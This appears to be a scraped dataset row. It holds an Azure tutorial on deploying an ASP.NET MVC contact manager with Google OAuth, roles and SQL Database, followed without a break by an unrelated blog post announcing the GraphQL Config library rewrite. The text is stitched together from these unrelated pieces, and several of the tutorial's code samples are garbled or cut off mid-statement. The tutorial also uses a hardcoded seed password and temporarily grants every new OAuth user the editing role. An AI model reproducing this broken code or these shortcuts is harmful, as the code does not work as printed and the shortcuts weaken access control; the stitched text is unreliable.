text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91
values | source stringclasses 1
value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
This:
This is a long tutorial. If you want a quick introduction to Azure App Service and Visual Studio web projects, see Create an ASP.NET web app in Azure App Service.
Or if you want to get started with Azure App Service before signing up for an Azure account, go to Try App Service, where you can immediately create a short-lived starter web app in App Service. No credit cards required; no commitments.
To complete this tutorial, you need a Microsoft Azure account. If you don't have an account, you can activate your MSDN subscriber benefits or sign up for a free trial.
To set up your development environment, you must install Visual Studio 2013 Update 4 or higher, and the latest version of the Azure SDK for Visual Studio 2013. This article was written for Visual Studio Update 4 and SDK 2.5.1.
From the File menu, click New Project.
In the New Project dialog box, expand C# and select Web under Installed Templates, and then select ASP.NET Web Application.
Name the application ContactManager and Web App is selected.
The configuration wizard will suggest a unique name based on ContactManager. You must decide whether to create a new App Service plan and resource group. For guidance on deciding whether to create a new plan or resource group, see Azure App Service plans in-depth overview. For this tutorial, you will probably want to create at least a new resource group. Select a region near you. You can use azurespeed.com to find the lowest latency data center. You will set up the database in the next step so do not click OK yet.
If you haven't created a database server before, select Create new server, enter a database name, app and database are in the same region.
In Solution Explorer open the Layout.cshtml file in the Views\Shared folder.
Replace the markup in the Layout.cshtml file with the following code. The changes are highlighted below.
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>@ViewBag.Title - Contact Manager</title> @Styles.Render("~/Content/css") @Scripts.Render("~/bundles/modernizr") </head> <body> <div class="navbar navbar-inverase navbar-fixed-top"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data- <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> @Html.ActionLink("CM Demo", "Index", "Cm", new { @RenderBody() <hr /> <footer> <p>© @DateTime.Now.Year - Contact Manager</p> </footer> </div> @Scripts.Render("~/bundles/jquery") @Scripts.Render("~/bundles/bootstrap") @RenderSection("scripts", required: false) </body> </html>
Press CTRL+F5 to run the app.
The application home page appears in the default browser.
This is all you need to do for now to create the application that you'll deploy to Azure.
Enable SSL. In Solution Explorer, click the ContactManager project, then click F4 to bring up the properties dialog. Change SSL Enabled to true. Copy the SSL URL. The SSL URL will be unless you've previously created SSL web apps.
In Solution Explorer, right click the Contact Manager project and click Properties.
In the left tab, click Web.
Change the Project Url to use the SSL URL and save the page (Control S).
Verify Internet Explorer is the browser.
Next, you'll update the app to add the ability to display and update contacts and store the data in a database. The app will use the Entity Framework (EF) to create the database and to read and update data. ASP.NET MVC scaffolding feature can automatically generate code that performs create, read, update, and delete (CRUD) actions..
In the Controller name text entry box, enter "CmController" for the controller name.
Click Add.
Visual Studio creates a controller methods and views for CRUD database operations for Contact objects.
The next task is to enable the Code First Migrations feature in order to create the database based on the data model that creates the database. The first parameter ( Initial ) is arbitrary and namespace.
using ContactManager.Models;
Replace the Seed method with the following code:
protected override void Seed(ContactManager.Models.ApplicationDbContext context) { code initializes (seeds) the database with the contact information. For more information on seeding the database, see Seeding and, and then click the CM Demo link; or navigate to.
The application shows the seed data and provides edit, details and delete links. You can create, edit, delete and view data. will see in this tutorial. To use Facebook as an authentication provider, see my tutorial MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on .
In addition to authentication, the tutorial will also use roles to implement authorization. Only those users you add to the canEdit role will be able to change data (that is, create, edit, or delete contacts).
Follow the instructions in my tutorial MVC 5 App with Facebook, Twitter, LinkedIn and Google OAuth2 Sign-on under Creating a Google app for OAuth 2 to set up a Google app for OAuth2. Run and test the app to verify you can log on using Google authentication.
If you want to create social login buttons with provider-specific icons, see Pretty social login buttons for ASP.NET MVC 5 statements:
using Microsoft.AspNet.Identity; using Microsoft.AspNet.Identity.EntityFramework;
Add the following AddUserAndRole method to the class:
bool AddUserAndRole(ContactManager.Models.ApplicationDbContext context) { IdentityResult ir; var rm = new RoleManager (new RoleStore(context)); ir = rm.Create(new IdentityRole("canEdit")); var um = new UserManager( new UserStore my ASP.NET Identity tutorials.
In this section you will temporarily modify the ExternalLoginConfirmation method in the Account controller to add new users registering with an OAuth provider to the canEdit role. We will temporarily modify the ExternalLoginConfirmation method to automatically add new users to an administrative role. Until we provide a tool to add and manage roles, we'll use the temporary automatic registration code below. We hope to provide a tool similar to WSAT in the future which allow you to create and edit user accounts and roles.
Run the Update-Database command which will run the Seed method, and that will run the AddUserAndRole you just added. The AddUserAndRole will create the user user1@contoso.com and add her to the canEdit role.
In this section you will apply the Authorize attribute to restrict access to the action methods. Anonymous users will be able to view the Index action method of the home controller only. Registered users will be able to see contact data (The Index and Details pages of the Cm controller), the About, and the Contact pages. Only users in the canEdit role will be able to access action methods that change data.
Add the Authorize filter and the RequireHttps filter to the application. An alternative approach is to add the Authorize attribute and the RequireHttps attribute to each controller, but it's considered a security best practice to apply them to the entire application. By adding them globally, every new controller and action method you add will automatically be protected, you won't need to remember to apply them. For more information see Securing your ASP.NET MVC App and the new AllowAnonymous Attribute.()); }
The Authorize filter applied in the code above will prevent anonymous users from accessing any methods in the application. You will use the AllowAnonymous attribute to opt out of the authorization requirement in a couple methods, so anonymous users can log in and can view the home page. The RequireHttps will require all access to the web app be through HTTPS.
Add the AllowAnonymous attribute to the Index method of the Home controller. The AllowAnonymous attribute enables you to white-list the methods you want to opt out of authorization.
public class HomeController : Controller { [AllowAnonymous] public ActionResult Index() { return View(); }
Do a global search for AllowAnonymous, you can see it is used in the log in); }
If you are still logged in from a previous session, hit the Log out link.
Click on the About or Contact links. You will be redirected to the log in page because anonymous users cannot view those pages.
Click the Register as a new user link and add a local user with email joe@contoso.com. Verify Joe can view the Home, About and Contact pages.
Click the CM Demo link and verify you see the data.
Click an edit link on the page, you will be redirected to the log in page (because a new local user is not added to the canEdit role).
Log in as user1@contoso.com with password of "P_assw0rd1" (the "0" in "word" is a zero). You will.
In Visual Studio, right-click the project in Solution Explorer and select Publish from the context menu.
The Publish Web wizard opens.
Click the Settings tab on the left side of the Publish Web dialog box. Click the v icon to select the Remote connection string for ApplicationDbContext and select the ContactManagerNN_db..
Right click on the web app and select Stop.
Alternatively, from the Azure Portal, you can select the web app, then click the stop icon at the bottom of the page.
await UserManager.AddToRoleAsync(user.Id, "canEdit"); we will remove local account access.
Verify you can navigate to the About and Contact pages.
Click the CM Demo link to navigate to the Cm controller. Alternatively, you can append Cm to the URL.
Click an Edit link. You will be redirected to the log in.
Right click on ContactDB and select Open in SQL Server Object Explorer.
If you haven't connected to this database previously, you may be prompted to add a firewall rule to enable access for your current IP address. The IP address will be pre-filled. Simply, click Add Firewall Rule to enable access.
Then, log in to the database with the user name and password that you specified when creating the database.
Right click on the UserId is from user1@contoso.com and the Google account you registered.
Follow my tutorials which build on this sample:
To enable the social login buttons shown at the top of this tutorial, see Pretty social login buttons for ASP.NET MVC 5.
Tom Dykstra's excellent Getting Started with EF and MVC will show you more advanced MVC and EF. You can also request and vote on new topics at Show Me How With Code. | https://azure.microsoft.com/en-us/documentation/articles/web-sites-dotnet-deploy-aspnet-mvc-app-membership-oauth-sql-database/?WT.mc_id=cmp_pst001_blg_post0152vis | CC-MAIN-2015-40 | refinedweb | 1,730 | 57.87 |
From: Andy Little (andy_at_[hidden])
Date: 2006-06-24 16:48:02
"Beth Jacobson" wrote
> Andy Little wrote:
>> "Beth Jacobson" wrote
>>
>> [...]
>>
>>> Under/overflow will certainly be an issue for some people if they can't
>>> specify their own base units, but I don't know if a tight coupling
>>> between units and dimensions is the best solution. Could there be
>>> some sort of global setting (a facet, maybe?) where we could specify
>>> units for base dimensions for the entire application?
>>
>> The quantity containers and unit typedefs can be easily customised by the
>> user
>> to whatever they prefer:
>>
>> namespace my{
>>
>> typedef boost::pqs::length::mm distance;
>> typedef boost::pqs::time::s time;
>> typedef boost::pqs::velocity::mm_div_s velocity;
>> }
>>
>> void f()
>> {
>> my:::velocity v = my::distance(1) / my_time(1);
>>
>> }
>>
>
> That would remove the unit declarations from the code, but the program
> still wouldn't be unit agnostic. Say I wrote a function like this
>
> my::area GetArea(my::length len, my::length width)
> {
> return len*width;
> }
>
> If I used it in a program using SI units, it would work exactly like
> what I'm proposing, but if the calling program used imperial units, it
> would first convert len and width from feet to meters, then multiply
> them, then convert the result from square meters back to square feet.
> The results would be the same either way (assuming no rounding issues),
> but it adds three unnecessary conversions.
You could rewrite the function:
#include <boost/pqs/t1_quantity/types/length.hpp>
#include <boost/pqs/t1_quantity/types/out/area.hpp>
#include <boost/pqs/typeof_register.hpp>
#include <boost/type_traits/is_convertible.hpp>
#include <boost/utility/enable_if.hpp>
template <typename Out, typename In>
typename boost::enable_if<
boost::mpl::and_<
boost::is_convertible<In, boost::pqs::length::m>,
boost::is_convertible<Out, boost::pqs::area::m2>
>,
Out
>::type
GetArea(In len, In width)
{
return len*width;
}
namespace pqs = boost::pqs;
int main()
{
pqs::length::ft length(2);
pqs::length::ft width(1);
BOOST_AUTO(result, GetArea<pqs::area::ft2>(length,width));
std::cout << result <<'\n';
}
but using SI units is more efficient, sure. The main use of imperial units is
for input output AFAICS
FWIW you can also use enable_if to prevent unwanted conversions of the arguments
if you wish, by using boost::is_same rather than is_convertible.
>>> Both your example and mine have a common element though. They both
>>> involve moving between numeric values and dimensions. I can't think of
>>> an instance where units would be useful when that isn't the case. If
>>> that's true, then it seems like overkill to require bound units
>>> throughout the program. A simpler solution would be to prohibit
>>> dimension variables from being assigned or returning "raw" numbers. The
>>> only way to get or set a value would be through unit functions like this.
>>
>> PQS quantities can't be converted to raw numbers.
>>
>> double val = pqs::length::m(1) ;// Error
>>
>> but a function is provided to get the numeric_value:
>>
>> double val = pqs::length::m(1).numeric_value() ;// Ok
>>
>> Its name is quite long so it's easy to spot in code.
>
> Thanks. I didn't see it in the docs, but I figured there had to be some
> fairly straightforward way to extract the value.
Oops.. Good catch. Its not in the docs!
>>> Since
>>> units would be specified at the point of conversion, this method might
>>> even be a little safer. In pqs, you might do something like this
>>>
>>> pqs::length::m depth;
>>>
>>> // lots of code
>>
>> Its not possible to initialise a double from a quantity in PQS:
>>
>>> double depthAsDouble(depth);
>>
>> so the the above will not compile.
>
> Then the line would look like this
> double depthAsDouble = depth.numeric_value();
Yep!
>>> SetFieldValue("DepthInFt", depthAsDouble);
>>>
>>> cout << "Enter new depth (in feet): "
>>> cin >> depth;
>>>
>>> Because depth is declared far from where it's output and reassigned,
>>> these mistakes would be easy to miss.
>>
>> Not so for the above reason!
>
> But when I use numeric_value(), the problem still remains: there's
> nothing in that line to tell you the units of the extracted value. It's
> not essential that there should be, but since this is one place where
> the library can't protect the user against units errors, it would be
> nice if such errors were easier to recognize.
You can use the units_str(q) function:
#include <boost/pqs/t1_quantity/types/out/length.hpp>
#include <utility>
template <typename Q>
std::pair<std::string,double>
SetFieldValue(Q q)
{
std::pair<std::string,double> result(units_str(q),q.numeric_value());
return result;
}
namespace pqs = boost::pqs;
int main()
{
pqs::length::ft length(1);
std::pair<std::string,double> field = SetFieldValue(length);
std::cout << field.first << ' ' << field.second <<'\n';
}
But sure, if you remove the units then its up to you to deal with what the
number means.
>> In PQS the units are part of the type. IOW the numeric value and its unit are
>> always tightly coupled in code. That is a powerful feature. Once the numeric
>> part of a quantity is disassociated from its unit then manual checking and
>> external documentation is required, which is often the current situation
>> wherever doubles are used to represent quantities. Manual checking doesnt
>> always
>> work as well as intended... That of course is why the Mars lander crashed!
>
> I agree that unit checking can be an extremely useful feature, I'm just
> not convinced that tight coupling is necessary to achieve that.
There is planned another quantity where you can change the units at runtime
FWIW.
> If my assumption that unit conversions are only needed when numeric
> values are assigned to or extracted from dimensions is correct, then
> dimensions don't really need to know about units. The units functions
> would need to have a concept of default dimension units so they'd know
> what they were converting from or to, but the dimensions themselves
> wouldn't know or care.
>
> That would be the real benefit of this system. Reducing the number of
> conversions and making units explicit at the point of conversion may
> have some small benefit, but making the dimensions library essentially
> unitless seems like a major advantage.
It depends what unitless means. If you want to just use base_units then you can.
The input output of units is a separate component, so you don't get it unless
you want it.
> Of course it's your library, and I'm not trying to dictate design. But
> if you're looking for a way to make the dimensions library essentially
> independent of units while retaining the unit safety of the current
> system, this might be a direction to consider.
Its difficult to see what you mean without a specific problem to consider.
regards
Andy Little
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk | https://lists.boost.org/Archives/boost/2006/06/106747.php | CC-MAIN-2019-43 | refinedweb | 1,124 | 54.32 |
GameFromScratch.com
Along with many others, I don’t really recommend C++ as someone’s first language for various reasons. Sometimes concrete examples aren’t easy to come by off the tip of your tongue, so I figured the next time I encountered one of those things that make C++ so beginner unfriendly, I would post it. Not the obvious stuff like memory leaks, dealing with the linker or exceptionally cryptic template errors, but the more benign stuff that add up to frustrate new and experienced users. If you are a veteran C++ coder, you will probably spot the problem in a second or two, but this is the kind of thing that will trip up a beginner completely and is a complete nightmare to solve.
Consider the following C++ header file:
#pragma once
#include "SFML/Audio.hpp"
class SoundFileCache
{
public:
SoundFileCache(void);
~SoundFileCache(void);
const sf::Sound& GetSound(std::string) const;
const sf::Music& GetSong(std::string);
private:
static std::map<std::string, sf::Sound> _sounds;
static std::map<std::string, sf::Music> _music;
};
class SoundNotFoundExeception : public std::runtime_error
{
public:
SoundNotFoundExeception(std::string const& msg):
std::runtime_error(msg)
{}
}
Pretty straight forward stuff right? Two class declarations, nothing really funky going on. Now consider the following implementation:
#include "StdAfx.h"
#include "SoundFileCache.h"
SoundFileCache::SoundFileCache(void) {}
SoundFileCache::~SoundFileCache(void) {}
const sf::Sound& SoundFileCache::GetSound(std::string soundName) const
{
std::map<std::string,sf::Sound>::iterator itr = _sounds.find(soundName);
if(itr == _sounds.end())
{
sf::SoundBuffer soundBuffer;
if(!soundBuffer.LoadFromFile(soundName))
{
throw new SoundNotFoundExeception(
soundName + " was not found in call to SoundFileCache::GetSound");
}
sf::Sound sound;
sound.SetBuffer(soundBuffer);
_sounds.insert(std::pair<std::string,sf::Sound>(soundName,soundBuffer));
}
else
{
return itr->second;
}
}
const sf::Music& SoundFileCache::GetSong(std::string soundName)
{
//stub
}
Again, pretty standard code, ignore the fact GetSound and GetSong don’t return values, they aren’t the issue here.
Now consider the error:
error C2533: 'SFMLSoundProvider::{ctor}' : constructors not allowed a return type
If you are new to the expression ctor, it basically just shorthand for constructor. For the record, it’s Visual Studio Express 2010 and if you double click that error, it brings you to this line:
SoundFileCache::SoundFileCache(void) {}
So… what’s the problem? By the error, it is quite obvious that the constructor doesn’t in fact return a value, so the message is clearly not the problem.
What then is the problem? I’ll show you after this brief message from our sponsors…
Welcome back… figured it out yet? If not, I don’t blame you, the warning sure as hell didn’t help. Here then is the offending code:
class SoundNotFoundExeception : public std::runtime_error
{
public:
SoundNotFoundExeception(std::string const& msg):
std::runtime_error(msg)
{}
} <-- Missing semicolon
So, forgetting a semi colon ( something you will do A LOT! ) results in a message that your constructor cannot return a value. Now, once you’ve been coding C++ for a while this kind of stuff becomes pretty much second nature. Getting nonsensical error messages? Check your header for a missing include guard or semi colon become pretty much the norm. But for a new developer, this is the beginning of a complete train wreck.
Think about if for a second, you just developed some of your first code, the error says you are returning something you aren’t, the compiler is pointing at your constructor and now you need to figure out just WTF is going on.. What do you do? Many run off to a forum and post the error verbatim and hope for an answer ( which they will probably get, learning nothing in the process ). Hopefully you Google it using exact quotes, but even then you get forum answers like this where you have a bunch of other new developers fixating on the error message itself and leading the developer down a wild goose chase. Fortunately a moderator stepped in and gave a proper explanation, but that doesn’t always happen. Even worse, it is a legit error, you really can’t return from a ctor, so if you encounter it again in the future you may actually have a real problem but find yourself instead on a missing semi-colon hunt!
How would this work in Java, C#, Python or Ruby? Well it wouldn’t, as no other modern language I can think of use header files any more. For good reason too, they add a level of complexity for very little positive return. It could be argued that separating interface from implementation is “a good thing”, but even that is munged up by the fact you can actually have you implementation in your header file. Also don’t get me wrong, other languages have their faults too, just wait till you get forced to go on your first Java XML configured error hunt, you will be begging for C++ errors again!
This is just a classic example of the little things experienced developer forget the pain of experiencing in the first place! As I said, once you’ve got a bit of experience this kind of stuff becomes second nature, but while you are learning this kind of error is absolutely horrific. It’s little things like this that add up and make it so hard to recommend new developers start with C++. When I say it isn’t pointers and memory management that make C++ difficult, I mean it. It’s crap like this.
Programming
CPP | http://www.gamefromscratch.com/post/2011/11/09/WhyCPP_is_not_friendly_to_beginners.aspx | CC-MAIN-2016-40 | refinedweb | 905 | 51.89 |
Like most readers, I write lots of unit tests as I code. I don't do TDD, which requires writing the tests beforehand, but I often have two panes open in my IDE at the same time one with the class I'm coding and one in which I'm banging out the corresponding unit tests. This allows me to test my code immediately when I save and build. Right away, I can tell that my code works correctly or contains off-by-one errors and other gremlins. I find this way of proceeding very agreeable. I have confidence in my code; and as I build up the large set of tests, I know I'm not inadvertently disrupting my previous work or that of my colleagues.
However, after years of working this way, I find that many tests are often hard to read. It's not the code itself (JUnit has done a good job over the years of improving syntax), it's that I often need to read the entire test through to understand what's being tested. Moreover, tests frequently have specific set-up requirements that can make up a significant portion of the test before the actual crucial line checks an
assert statement. And that
assert statement is often not terribly informative.
A final difficulty is JUnit's suboptimal syntax for supporting parameterized tests. These are the tests in which you send lots of values to the same routine to make sure it provides the right response under a variety of inputs. For example, if you are parsing regular expressions and testing the error detection, you'd want to send a large number of incorrect combinations and make sure all are properly rejected. With JUnit, such a test requires a lot of choreography.
So for a while, I've been looking at how to make my tests more readable and easier to write. The solution I've been moving towards is to use BDD tools. BDD (behavior-driven development) has at its core a series of tests that specify what behavior a program should exhibit when a certain action takes place. The many BDD frameworks in use today favor a syntax that has a flow that's roughly: Given a situation, when an action occurs, then a specified set of results should ensue. For example:
given a bank balance of $100
when a withdrawal of $150 is attempted
then an error should be displayed and the balance should be $100
I write lots of these tests, too. While I should embrace the entire BDD philosophy, which prescribes translating all requirements and user stories into tests of this kind, I instead write these tests just before I start in on a given piece of work. They are higher-level than unit tests and often span multiple units. Ideally, they incarnate some activity that would normally be part of UATs.
Most BDD frameworks ride on top of JUnit, which enables easy integration into innumerable IDEs and workflows. As a result, it is entirely possibly to write unit tests using this kind of syntax. Over the last year, I've been doing more of this. And as the readability soars, I find that I've essentially forgone the old, classic JUnit syntax.
In my case, because I like writing unit tests in Groovy, I use a Groovy-based framework, called Spock. (There are many other options including easyb and Cucumber. They all do roughly the same thing and use similar syntax.) The choice of Groovy to write unit tests for Java code is probably worth a separate editorial, but is one of the most productive decisions I've taken. Groovy has many useful features that simplify writing tests. The two that leap to mind are optional typing, which facilitates creating test objects, and method injection. Groovy's metaprogramming capabilities enable me to inject a new method into any object on the fly. Powerful stuff!
Returning to Spock, here's an example of a parameterized test:
class HelloSpock extends spock.lang.Specification {
def "length of Spock's and his friends' names"() {
expect: name.size() == length
where: name | length
"Spock" | 5
"Kirk" | 4
"Scotty" | 6
}
}
Notice the test name is a string, which appears in any failure diagnostic. Already this is more readable than trying to use the JUnit convention of putting the explanation in an oversized Java method name. The test is clearly evident in the "expect" statement; the table of values in the "where" statement is clear, understandable, and trivial to write. The result of this elegant and quick syntax is that I often go overboard and create a table with every possible edge value. In the above example, for example, I would surely test an empty string as well as one that consisted only of spaces.
More-complex tests are also elegantly supported. For example:
def "should send messages to all subscribers"() {
when:
publisher.send("hello")
then:
1 * subscriber.receive("hello")
1 * subscriber2.receive("hello")
}
This test verifies that when a publisher sends a "hello" message, the two subscribers receive it exactly once. If they don't receive it or receive it more than once, the test fails. It's not hard to extend this snippet to express the expected behavior of mocks, is it?
I could go on; but the point is that, using this new syntax, my tests are far more readable, easier to write, and they invite me to include truly comprehensive testing at unit levels and higher.
— Andrew Binstock
Editor in Chief
alb@drdobbs.com
Twitter: platypusguy | http://www.drdobbs.com/jvm/java-message-service/jvm/a-better-syntax-for-unit-tests/240163843 | CC-MAIN-2016-36 | refinedweb | 923 | 61.97 |
Docs |
Forums |
Lists |
Bugs |
Planet |
Store |
GMN |
Get Gentoo!
Not eligible to see or edit group visibility for this bug.
View Bug Activity
|
Format For Printing
|
XML
|
Clone This Bug
while trying to emerge rzip 2.0-r1 I ran into the following problem
checking for BZ2_bzBuffToBuffCompress in -lbz2... yes
checking for errno in errno.h... yes
checking for mmap... yes
checking for strerror... yes
checking for getopt_long... yes
updating cache ./config.cache
creating ./config.status
creating Makefile
creating config.h
gcc -I. -I. -O2 -pipe -c rzip.c -o rzip.o
gcc -I. -I. -O2 -pipe -c runzip.c -o runzip.o
gcc -I. -I. -O2 -pipe -c main.c -o main.o
main.c: In function 'write_magic':
main.c:50: error: 'uint32_t' undeclared (first use in this function)
main.c:50: error: (Each undeclared identifier is reported only once
main.c:50: error: for each function it appears in.)
main.c:50: error: parse error before "v"
main.c:62: error: 'v' undeclared (first use in this function)
main.c: In function 'read_magic':
main.c:78: error: 'uint32_t' undeclared (first use in this function)
main.c:78: error: parse error before "v"
main.c:92: error: 'v' undeclared (first use in this function)
main.c: In function 'decompress_file':
main.c:143: warning: assignment makes pointer from integer without a cast
make: *** [main.o] Error 1
make: *** Waiting for unfinished jobs....
!!! ERROR: app-arch/rzip-2.0-r1 failed.
!!! Function src_compile, Line 567, Exitcode 2
!!! emake failed imagemagick nls png ppc-macos sdl userland_Darwin kernel_Darwin elibc_Darwin"
Unset: ASFLAGS, CTARGET, LANG, LC_ALL, LDFLAGS, LINGUAS, PORTDIR_OVERLAY
Created an attachment (id=68517) [edit]
rzip-2.0-darwin.patch.
Didn't work for me ;(
However, I could get it at least to compile if I add a
#include <stdint.h> in main.c or rzip.h
do you have the latest XCode tools installed?
> do you have the latest XCode tools installed?
XCode 2.0 (came with my Tiger CD)
Build 514, I suppose.
Latest is XCode 2.1, I think.
but which one do you have installed?
I use XCode 2.1, build 621
> but which one do you have installed?
XCode 2.0 (came with my Tiger CD)
Build 514
Do you care about upgrading? We only support the latest XCode tools, because
it
also solves a lot of linker problems.
> Do you care about upgrading? We only support the latest XCode tools, because it
> also solves a lot of linker problems.
Done upgrading to XCode 2.1
With the patch rzip emerges fine.
Ok, then I will check this one on Pather today, and see if it works there too
with the latest Xcode available there. I think I can check this in later today.
Thanks for trying Dirk.
compiled and worked on Panther also.
I am hestitant to put this in portage in the same ebuild. ferringb, could you
advise on this patch whether to apply is unconditional or not, and put it in the
current ebuild, or in a -r2? And do you agree with it?
Yuck.
Conditionally pull in a strndup function is my preferred solution.
Created an attachment (id=68679) [edit]
extended patch that uses autoconf to check fort strndup
this patch uses autoconf to check for strndup and uses replacement code only
when not available.
Created an attachment (id=68680) [edit]
patches applied to the sources
Another attempt to fix the issue, this time a little bit decent.
I created a separate file that holds the strndup implementation. It's header
file is now included by the main.c file. The strndup code is optional based on
the existence of strndup according to configure.
Created an attachment (id=68681) [edit]
strutils.c
strutils.c file which implements strndup
Created an attachment (id=68682) [edit]
strutils.h
header file for strutils.c
Created an attachment (id=68688) [edit]
patched ebuild
these are my changes to the ebuild to get the previously supplied files and
patches working
> these are my changes to the ebuild to get the previously supplied files and
> patches working
I think the code looks good, and the package emerges fine.
Created an attachment (id=68987) [edit]
cleaned up patch
Hola. cleaned up the patch a bit, fixing up lot of old/icky autoconf crap with
it, and lack of DESTDIR make support.
please take it for a spin;
Created an attachment (id=68988) [edit]
updated ebuild patch.
> Hola. cleaned up the patch a bit, fixing up lot of old/icky autoconf crap with
> it, and lack of DESTDIR make support.
> please take it for a spin;
Emerges fine here.
patch is in as rzip-2.0-r1, keyword at your leisure. ;)
-r2 I assume/know for sure.
now also available for ~ppc-macos-xians
Brian, thanks for your additional patching/efforts!
This "cleaned up" patch that is "fixing up lot of old/icky autoconf crap with
it" broke rzip on at least x86. See bug [217552]. And yes, I choose ugly but
working over nice but breaking silently every time. | http://bugs.gentoo.org/105858 | crawl-002 | refinedweb | 837 | 78.75 |
Routing in React Applications
In the last post, we talked about how to set up a real React environment and make a real React application. But a real React application is not really complete without routing. What’s this whole routing thing you ask? You know when you navigate your way to an internet site and the address changes? Well, that’s because the site is routing you—routing you from one address to another when the page loads. On Wordpress as well as on other “traditional” website, the page is loaded for each page. In React applications, however, we have routing that doesn’t require a page reload.
In contrast to other standard websites that we are familiar with, in React (and Angular BTW) you can choose whichever routing system you want. For educational purposes and to make examples for this article, I’ll use the popular React routing system call… (wait for it…) React Router. Guess you didn’t fall out of your chair, right? What’s good about this React routing system is that its simple. In order to practice with it, we’ll build an application that contains a home page and an about page.
To get started, we’ll create a React application using create react app. The command that follows is for installing the routing. And no, it’s not terribly complicated. All it is is a very simple node module. Go to the command line and run:
npm install react-router-dom --save
The save is designed to keep the react-router-dom inside of the package.json, which is our installation file. After we’ve done this, we can start using React Router. That’s right, it’s just that simple!
In order to start using React Routing, we need to surround our entire application or at least the part that will use the routing.
import React from 'react'; import { Switch, Route, Link } from 'react-router-dom'; import Home from './Home.jsx'; import About from './About.jsx'; class MainApp extends React.Component { render() { return <div> <nav> <ul> <li><Link to='/'>Home</Link></li> <li><Link to='/about'>About</Link></li> </ul> </nav> <h1>This is my App</h1> <main> <Switch> <Route exact path='/' component={Home} /> <Route path='/about' component={About} /> </Switch> </main> </div> } } export default MainApp;
There are a few router components here. The first is the main in which all of the content changes according to the routing we choose. Inside the main there is the switch which has the routing components inside of it—one for each path which in turn have other components inside of them. These components will be loaded when the path changes. How do we change the path? Notice the link component that takes the the ‘to’ property.
You can see how this works in the demo that I made. It’s a little wacky, ‘cause the routes that I wrote aren’t really the best, but notice that it doesn’t really matter because there isn’t any page reload. I just wanted to take care of the routing—the application is very basic so that anyone who wants to can learn from it.
So now it’s time to build your own practice application and play around with it a bit so you can better understand the basics of routing. It’s pretty easy really, once you grasp the idea of the components. | http://www.discoversdk.com/blog/routing-in-react-applications | CC-MAIN-2019-09 | refinedweb | 569 | 73.17 |
GraphQL Config
Explore our services and get in touch.
TLDR
- Visit our website graphql-config.com
- GraphQL Config is one simple place to store all your GraphQL Configurations for any GraphQL based tool
- Prisma recently transferred the project to The Guild — and we completely rewrote it and addressed more than ⅔ of the issues (and the remaining are waiting for feedback)
- We’ve already merged configurations from GCG, GraphQL Inspector, GraphQL CLI — and are looking to learn and integrate with GraphiQL, AppSync, Apollo, Gatsby, VS-Code extensions, Relay and the GraphQL team at Facebook and any GraphQL tool creators
- This is an alpha phase — we want your feedback, as a user and as a creator — Please create an issue or join our Discord channel
How did we get here?
About 2 years ago Prisma came up with a great idea for the GraphQL community — Why repeat yourself in creating your configuration for each tool you use in your application.
So together with many developers from the GraphQL community, they introduced the GraphQL Config library and spec and many tools have since embraced that standard.
But time has passed and the library slowly became unmaintained.
Prisma were very kind and generous with moving the project forward and passing it to us.
So when we took over the GraphQL Config, our main goal was to bring it back to life and push it forward for the community.
We asked for feedback, looked at existing and new tools that came out since it was released, went through all the open issues and PRs, listened to your suggestions and got to work!
Our main goals are
- Highly customizable and extensible
- More useful structure
- Flexible and helpful enough to become a standard in the community
- Make it platform agnostic (Node, Browser)
Try it out today
We’ve already refactored most of the code, created a new structure, referenced all the related issues and released a new alpha version:
npm install graphql-config@next
yarn add graphql-config@next
Now we want to hear from you — GraphQL developers and GraphQL tool creators.
Here is a deeper dive into what we’ve done:
Different formats of GraphQL Config file
The new GraphQL Config now allows to use JSON, YAML and JavaScript.
GraphQL Config looks for:
.graphqlrc
.graphqlrc.yaml
.graphqlrc.yml
.graphqlrc.json
.graphqlrc.js
graphql.config.js
The new config can also be created programmatically too.
It also accepts a config defined under
graphql property in your
package.json file.
We’re open to expand the range of file names and looking forward to hear more of your use cases.
New structure
GraphQL Config allowed to indicate a single graphql file, an introspection file or a URL to an endpoint. That’s the past!
schema: './schema.graphql' documents: './my/app/**/*.graphql' extensions: customConfig: value: true
Schema
We’ve decided to expand GraphQL Config for variety of sources of GraphQL Schema and rename
schemaPath to just
schema.
It accepts now not only a single file but also a glob pattern to match your modularized schema.
Allows to generate schema from:
- files matching a glob pattern (or a list of patterns)
- an explicit list of files
- an endpoint
- an introspection file
- TypeScript and JavaScript files
- and even more…
It was possible thanks to the concept of Loaders which we’ll talk about later in the article.
Documents
Majority of the GraphQL tools depend not only on Schema but Operations and Fragments, so we’ve decided to cover that use case too.
With the new GraphQL Config, you’re able to indicate files containing GraphQL operations and fragments (documents) and load them all within a single method.
GraphQL Config accepts not only
.graphql files but also extracts documents from TypeScript and JavaScript files, including JSX and TSX.
import React from 'react'; import gql from 'graphql-tag'; import { useQuery } from '@apollo/react-hooks'; // GraphQL Config is able to extract it! const GET_USERS = gql` { user { id name } } `; export function Users() { const { loading, error, data } = useQuery(GET_USERS); // ... return <UsersList users={data.users} />; }
Thanks to that, you can still write your operations and fragments with
graphql-tag and put them in your React components. GraphQL Config is smart enough to find and collect them.
Include and Exclude
Include and
Exclude options are still relevant, but we improved and fixed the logic behind them.
Their purpose is to tell config’s consumer which files belongs to what project.
Files covered by schema or documents options are automatically included, there’s no need to include them twice.
Extensions
We also kept
extensions and turned them into a first class citizen in GraphQL Config, making them way more powerful than before.
schema: './schema/*.graphql' extensions: codegen: generates: ./src/types.ts: plugins: - typescript - typescript-resolvers
Pluggable loaders
The source of GraphQL Schema may differ, depending on the setup. In some projects SDL is kept within graphql files, others store it in code.
The new GraphQL Config is capable of loading schema from:
.graphqlfiles
- introspection result file
- running endpoints
- Files on GitHub
- Files on Git repository
- files with documents wrapped with
graphql-tagand gatsby’s
graphql
- documents with the magic comment
/* GraphQL */
- single JavaScript and TypeScript file that exports GraphQLSchema object, DocumentNode or schema as string
The possibilities are endless here!
The main idea behind loaders is to extend the default behavior of GraphQL Config and allow to load GraphQL Schema from many different sources.
Loaders are flexible enough to let you decide what exactly you want to use, even just to keep the bundle size smaller.
